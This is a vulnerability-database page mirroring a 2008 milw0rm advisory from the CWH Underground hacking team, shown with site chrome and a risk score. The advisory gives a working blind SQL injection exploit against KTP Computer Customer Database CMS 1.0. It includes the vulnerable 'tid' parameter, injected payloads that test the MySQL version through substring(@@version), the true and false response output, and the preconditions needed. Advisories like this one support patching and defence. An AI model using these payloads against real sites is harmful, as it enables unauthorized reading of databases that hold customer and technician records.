Lucene search

K

KTP Computer Customer Database CMS 1.0 - Blind SQL Injection Vulnerability

๐Ÿ—“๏ธย 01 Jul 2014ย 00:00:00Reported byย RootTypeย 
seebug
ย seebug
๐Ÿ”—ย www.seebug.org๐Ÿ‘ย 17ย Views

KTP Computer Customer Database CMS 1.0 - Blind SQL Injection Vulnerability. Need Magic_quote = Off. Test Blind SQL Injection in MYSQL Version 5

Show more
Code

                                                ================================================
  KTPCCD CMS Blind SQL Injection Vulnerability
================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 30 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : APPLICATION : KTP Computer Customer Database CMS
 VERSION     : 1
 DOWNLOAD    : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
#####################################################

**Need Magic_quote = Off**

--- Blind SQL Injection ---

Login as user or Register at http://[Target]/[ktp_path]/?p=tech&a=ntech then goto Exploit...

---------
 Exploit
---------

Test Blind SQL Injection in MYSQL Version 5

[!]True
[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=5--

Result
Home Phone: 122-131-3123
Cell Phone: 123-123-3123
Fax Number: 123-213-1321
A+ Certifcation ID: 312 


[!]False
[+] http://[Target]/[ktp_path]/?p=tech&a=vtech&tid=1%27%20and%20substring(@@version,1,1)=4--

Result
Home Phone: n/a
Cell Phone: n/a
Fax Number: n/a
A+ Certifcation ID: (Technician is not certified) 

#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-30]

                              

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
17
.json
Report